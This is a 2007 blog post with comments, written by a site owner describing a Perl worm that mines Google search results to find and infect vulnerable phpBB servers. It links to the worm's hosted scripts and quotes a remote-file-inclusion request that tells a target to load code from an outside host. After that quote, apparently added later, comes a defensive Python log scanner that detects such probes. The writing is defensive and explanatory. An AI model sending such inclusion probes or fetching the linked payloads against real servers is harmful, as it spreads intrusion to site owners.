Tuesday, January 02, 2007

Botnet Perl/Asan.A.worm Mining Google and Infecting phpBB

Finally got in touch with one of the owners of a server that was hacked and actively mounting the botnet attack, and got some good information. There was a file installed on the server called gugl.txt, which was a Perl script that had an active load running on the server when it was shut down.

Took about 5 seconds to glance at this file and it's obvious I was absolutely correct about how they were finding vulnerable sites: Google was the primary data mining facility. The only thing I found a bit odd is why they were using Google Japan (www.google.co.jp) when the other evidence I found pointed to Google Turkey. Perhaps two different hackers or worms, perhaps just spreading the load around so Google won't notice; who knows.

The file they download to your server to locate more vulnerable servers is here:

http://lawhelper.com.ua/gugl.txt

When I opened the file my virus scanner claimed it was a Perl.Asan virus, so I did a bit of research: Panda claims it's the Perl/Asan.A.worm, or something similar, that locates and infects phpBB systems.

Here are the searches, in human-readable form, that gugl.txt was using to look for vulnerabilities:


Google likes to claim they "Do No Evil" but they sure allow themselves to be used for evil.

Would it be too much to ask that Google plug some holes or block some types of searches to stop these worms from finding vulnerable websites?

Come on guys, with all your Billion$ you should be able to have a few security experts on hand, maybe working in conjunction with Panda, Symantec and such, that keep on top of these specific threats and block the specific searches used to locate vulnerable sites.

Not just Google either, they were just the search engine in the center of this particular attack, but the other search engines like Yahoo, Ask and MSN should be blocking access to this stuff as well.

Technically, my server is only under attack because Google showed one of these worms that the phrase "PhotoCart" existed somewhere on my server, and it's not even the software these idiot hackers are looking for in the first place.

Gee thanks Google, like I needed this problem.

Sheesh.

At least now I know what I'm up against.

3 comments:

Unknown said...

I believe that we do a pretty good job at blocking these already. What was the specific phrase that was used to find you in Google?

IncrediBILL said...

Appreciate you looking into this Matt!

Guess I'm not sure why they would still be launching scripts culling results from Google if they were no longer expanding their botnet from the results?

Some of the spot tests I ran on a few queries got some valid hits, don't know if those servers were still vulnerable or not, but I could easily find out :)

Guess my post was a little misleading in that I don't run a phpBB, but some of the sites attacking me did, and the script I referenced was running in a breached phpBB account today.

They appear to change scripts at some point during the day and look for different things, so I was unable to get an exact copy of the strings that they used to locate my server.

However, I know I was being hit with the PhotoCart vulnerability, which I also don't run, but apparently have the term PhotoCart somewhere on my server as it was "inurl:/PhotoCart/" that I noticed being used in one instance.

They send this string to my webserver from a bunch of IPs over and over for a period of time every day:

"GET /PhotoCart/adminprint.php?path=http://artelj.com/c.ar"

Looks like artelj.com is offline now, but this is the 5th or 6th site they've used as a repository since this started, I expect them to start with a new site tomorrow.

Basically, several of the servers that are involved with the attack appear to have been breached via phpBBs, I think a Mambo or two, it's a total crapshoot what's hitting my box, but they're definitely using Google, Altavista and others.

Check out this page:
http://lawhelper.com.ua/guglb.txt
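A defender-side check for the probe quoted in the comment above, added here as an example (it is not the post's or the worm's code): the script parses a few constructed Apache combined-format log lines (RFC 5737 test addresses, not the commenter's real traffic) and flags any request where a query parameter carries an absolute URL to another host, which is the remote-file-inclusion pattern behind `adminprint.php?path=http://artelj.com/c.ar`. It also counts hits per source IP, since the comment describes the same string arriving from many addresses.

```python
import re
from collections import Counter
from urllib.parse import urlsplit, parse_qsl

# Constructed sample lines in Apache combined log format; the request target on the
# first three mirrors the probe quoted in the comment, the fourth is ordinary traffic.
SAMPLE_LOG = """\
203.0.113.10 - - [02/Jan/2007:10:15:01 -0800] "GET /PhotoCart/adminprint.php?path=http://artelj.com/c.ar HTTP/1.1" 404 512 "-" "Mozilla/4.0"
203.0.113.10 - - [02/Jan/2007:10:15:03 -0800] "GET /PhotoCart/adminprint.php?path=http://artelj.com/c.ar HTTP/1.1" 404 512 "-" "Mozilla/4.0"
198.51.100.7 - - [02/Jan/2007:10:16:20 -0800] "GET /PhotoCart/adminprint.php?path=http://artelj.com/c.ar HTTP/1.1" 404 512 "-" "Mozilla/4.0"
192.0.2.44 - - [02/Jan/2007:10:17:00 -0800] "GET /forum/viewtopic.php?t=42 HTTP/1.1" 200 8120 "http://www.google.co.jp/search?q=phpbb" "Mozilla/5.0"
"""

# Enough of the combined format to recover source IP, method, request target and status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+)[^"]*" (?P<status>\d{3})'
)


def rfi_params(target):
    """Return (name, value) pairs from the query string whose value is an
    absolute URL with a host, i.e. a parameter that could pull remote code."""
    hits = []
    for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        parts = urlsplit(value)
        if parts.scheme in ("http", "https", "ftp") and parts.netloc:
            hits.append((name, value))
    return hits


def scan_log(text):
    """Count RFI-style probes per source IP and collect the remote hosts they
    point at (the 'repository' sites the comment says rotate every few days)."""
    per_ip = Counter()
    remote_hosts = set()
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # malformed line; skip rather than crash
        for _name, value in rfi_params(m.group("target")):
            per_ip[m.group("ip")] += 1
            remote_hosts.add(urlsplit(value).netloc)
    return per_ip, remote_hosts


if __name__ == "__main__":
    counts, hosts = scan_log(SAMPLE_LOG)
    for ip, n in counts.most_common():
        print(f"{ip}: {n} RFI probe(s)")
    print("remote hosts referenced:", sorted(hosts))
```

The remote host set is the useful pivot for blocking or takedown requests; the per-IP counts show which sources are repeating the probe.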

IncrediBILL said...

Matt,

One last thought, I didn't dig through their script too hard, but I just took another quick look and it didn't look too bright. What appears to be happening is that they just blindly attack ANY results from Google.

Therefore, if you cleaned up the results from returning what they specifically search for as you claimed, that would explain why my server is now a target being ruthlessly pounded on a daily basis because of the fewer results.

OK, back to the drawing board Mr. Cutts...